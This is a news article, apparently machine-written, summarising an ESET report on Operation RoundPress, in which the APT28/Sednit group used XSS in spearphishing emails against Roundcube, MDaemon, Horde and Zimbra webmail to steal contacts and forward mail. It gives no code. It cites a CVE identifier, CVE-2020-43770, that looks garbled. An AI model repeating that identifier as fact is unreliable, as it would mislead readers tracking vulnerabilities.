Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

Spies Hack High-Value Mail Servers Using Exploits from Yesteryear




Spies hack high-value mail servers using an exploit from yesteryear. ESET reported that Sednit, a Kremlin-backed hacking group, gained access to high-value email accounts by exploiting cross-site scripting (XSS) vulnerabilities in four different mail server packages. The attacks targeted government and defense contractors in several countries and highlight the ongoing threat posed by aging software bases.

  • Sednit, a Kremlin-backed hacking group, exploited XSS vulnerabilities in mail server software from four different makers.
  • The attacks targeted mail servers used by defense contractors and governmental organizations in Bulgaria, Romania, Africa, the European Union, and South America.
  • Sednit delivered XSS exploits through spearphishing emails, which were then executed when viewed from a vulnerable webmail instance.
  • The group exploited zero-day vulnerabilities and unpatched vulnerabilities in MDaemon and Horde.
  • The attacks highlighted the ongoing threat posed by aging software bases and the importance of regular security updates.



    • In a concerning turn of events, security firm ESET has reported that Sednit, a Kremlin-backed hacking group also tracked as APT28, Fancy Bear, Forest Blizzard, and Sofacy, gained access to high-value email accounts by exploiting cross-site scripting (XSS) vulnerabilities in mail server software from four different makers. These packages include Roundcube, MDaemon, Horde, and Zimbra.

    The attacks, which have been dubbed Operation RoundPress, targeted mail servers used by defense contractors in Bulgaria and Romania, some of which are producing Soviet-era weapons for use in Ukraine as it fends off an invasion from Russia. Governmental organizations in those countries were also targeted. Other targets have included governments in Africa, the European Union, and South America.

    The Sednit group delivered XSS exploits through spearphishing emails. Hidden inside some of the HTML in the emails was an XSS exploit. In 2023, ESET observed Sednit exploiting CVE-2020-43770, a vulnerability that has since been patched in Roundcube. A year later, ESET watched Sednit exploit different XSS vulnerabilities in Horde, MDaemon, and Zimbra. One of the now-patched vulnerabilities, from MDaemon, was a zero-day at the time Sednit exploited it.

    The JavaScript included in the HTML portions of the emails exploited vulnerabilities built into the different mail servers. XSS exploits allow an attacker to control code that runs in a browser as it visits an affected site. The Sednit code caused mail clients to send contacts and previous emails to attacker-controlled servers. In some cases, it also created a sieve rule that would forward all emails received in the future to a Sednit address.

    Like most XSS exploits, the Sednit JavaScript ran only when someone viewed the malicious email from a vulnerable webmail instance. In this respect, the infections had no persistence, although the JavaScript could run again and again as long as the email was reopened.

    The Operation RoundPress exploit chain is a concerning reminder that even the most modern software can be vulnerable to exploitation if not properly patched. The use of XSS exploits in these attacks highlights the ongoing threat posed by aging software bases and the importance of regular security updates.

    Sednit's reliance on XSS exploits to pilfer email secrets sounds more like something from a decade or two ago. These sorts of exploits in the wild aren't a regular occurrence in more recent years, although they live on, especially in aging software bases.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Spies-Hack-High-Value-Mail-Servers-Using-Exploits-from-Yesteryear-ehn.shtml

  • https://arstechnica.com/security/2025/05/spies-hack-high-value-mail-servers-using-an-exploit-from-yesteryear/

  • https://nvd.nist.gov/vuln/detail/CVE-2020-43770

  • https://www.cvedetails.com/cve/CVE-2020-43770/

  • https://www.trendmicro.com/en_us/research/14/j/operation-pawn-storm-the-red-in-sednit.html

  • https://www.welivesecurity.com/en/videos/sednit-xss-govt-entities-defense-companies/

  • https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108

  • https://attack.mitre.org/groups/G0007/

  • https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/

  • https://www.logpoint.com/en/blog/emerging-threats/forest-blizzard/

  • https://thehackernews.com/2025/05/russia-linked-apt28-exploited-mdaemon.html

  • https://www.ginc.org/apt28/


    • Published: Thu May 15 09:31:20 2025 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us